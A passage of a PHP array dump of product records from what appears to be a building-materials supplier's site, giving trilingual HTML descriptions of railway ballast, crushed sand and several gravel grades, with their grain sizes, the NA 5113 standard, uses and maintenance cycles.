<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">حلت </span><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> محل الطمي عندما دخلت حيز الاستخدام.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">العناصرالمستخدمة في</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> بشكل عام : الحجر المسحوق ، بحجم حبة يتراوح بين 31.5 و 50 مم. يختلف نوع الصخور المستخدمة باختلاف المناطق والبلدان اعتمادًا على المناخ. توجد صخور من النوع الجوفي: الجرانيت ، الديوريت ، إلخ. </span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب أن تتوافق عناصر</span></span></small><span style="font-size:16px"><strong>حصى الصابورة</strong></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> معًا لتشكيل كتلة مضغوطة ولكنها قابلة للاختراق</span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم التحكم في <strong>حصى الصابورة</strong> مقاس <strong>25/50 مم</strong> وفقًا لمعيار <strong>NA 5113</strong>.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>مجال الاستعمال</u></strong></span><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم </strong>في :</span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>السكك الحديدية</strong></span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>عراقيل:</u></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خضع </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> لنوعين من التآكل:</span></span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التلوث بالمواد الطفيلية ، مثل الأرض. تتم إزالة الأعشاب الضارة ، ولكن من الضروري استبدال </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> بانتظام ؛</span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تسوية </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> تحت الأعضاء المتقاطعة ؛ يتسبب في تشوه عمودي للمسار. من الضروري إعادة حقن</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> ذات حجم الجسيمات الصغيرة تحت العوارض ؛ أو لإجراء عملية صيانة باستخدام آلة الدك. يتم تنفيذ هذا النوع من العمليات كل سبع سنوات تقريبًا.</span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">نقوم بغربلة </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> كل عشرين عامًا لاستبدال الأحجار المكسورة. يبلغ العمر الافتراضي </span></span></span><span style="color:#FF0000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">ل</span></span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong>حوالي أربعين عامًا قبل أن يتم استبدالها بالكامل.</span></span></span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is the layer of stones or gravel on which the railway track is anchored.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel Ballast</strong> refers to the mixture of pebbles and sand spread on the ground or under the railroad tracks. <strong>The Gravel Ballast</strong> came into use and replaced silting.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> generally used: crushed stone, with a grain size varying between 31.5 and 50 mm. The type of rocks used varies according to</span></span> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">regions and countries depending on the climate. There are rocks of the plutonic type: granite, diorite, etc. </span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> must fit together to form a compact but permeable mass.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></p>
<pre style="text-align:right">
</pre>
<p style="text-align:left"><u><span style="color:#008000"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Constraints:</span></span></strong></span></u></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Gravel Ballast undergoes two types of wear:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Contamination by parasitic materials, eg earth. Weeding is carried out, but it is necessary to replace the <strong>Gravel Ballast</strong> regularly;</span></span></li>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Settlement of the <strong>Gravel Ballast</strong> under the cross members; it causes a vertical deformation of the track. It is necessary to reinject the <strong>Gravel Ballast</strong> of small particle size under the sleepers; or to carry out a maintenance operation using a tamping machine. This kind of operation is carried out approximately every seven years.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">We sift the <strong>Gravel Ballast</strong> every twenty years to replace the broken stones. The <strong>Gravel Ballast</strong> has a useful life of about forty years before having to be completely replaced.</span></span></p>
',
'img_prd' => 'produit-1611734651.png',
'img_prd_detail' => '',
'Code_Pr' => '9959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611734651.pdf',
'pos_slider' => '3'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 5 => array(
'Produit' => array(
'id' => '959',
'nom_fr' => 'Sable Concassé ',
'nom_ara' => 'حصى ',
'nom_en' => 'Gravel ',
'sous_nom_fr' => ' 0/4 mm',
'sous_nom_ara' => ' مم 0/4',
'sous_nom_en' => '0/4 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Sable Concassé 0/4 mm </strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Mortiers</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Sable Concassé 0/4 mm </strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Sable Concassé 0/4 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Sable Concassé 0/4 mm </strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:18px"><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif">:</span></small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> مدافع الهاون</span></span></strong></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif">is controlled according to the <strong>NA 5113</strong> Standard.</span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Civil Engineering Work</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Mortars</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Hydraulic Concrete</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><strong><u>Recommendations</u> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
</div>
',
'img_prd' => 'produit-1611822601.png',
'img_prd_detail' => '',
'Code_Pr' => '959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611738453.pdf',
'pos_slider' => '7'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 6 => array(
'Produit' => array(
'id' => '489',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '15/25 mm',
'sous_nom_ara' => ' 25/15 مم',
'sous_nom_en' => '15/25 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>15/25 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>15/25 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>15/25 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></strong><span style="font-size:18px"><strong><small> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></span></span></strong></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <u><span style="color:#008000"><strong> </strong></span></u></span></span><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span></p>
</li>
</ul>
<ul>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations:</strong></u></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611736339.png',
'img_prd_detail' => '',
'Code_Pr' => '489',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611736339.pdf',
'pos_slider' => '4'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 7 => array(
'Produit' => array(
'id' => '485',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '4/8 mm',
'sous_nom_ara' => '4/8 مم',
'sous_nom_en' => '4/8 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm </strong></span>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
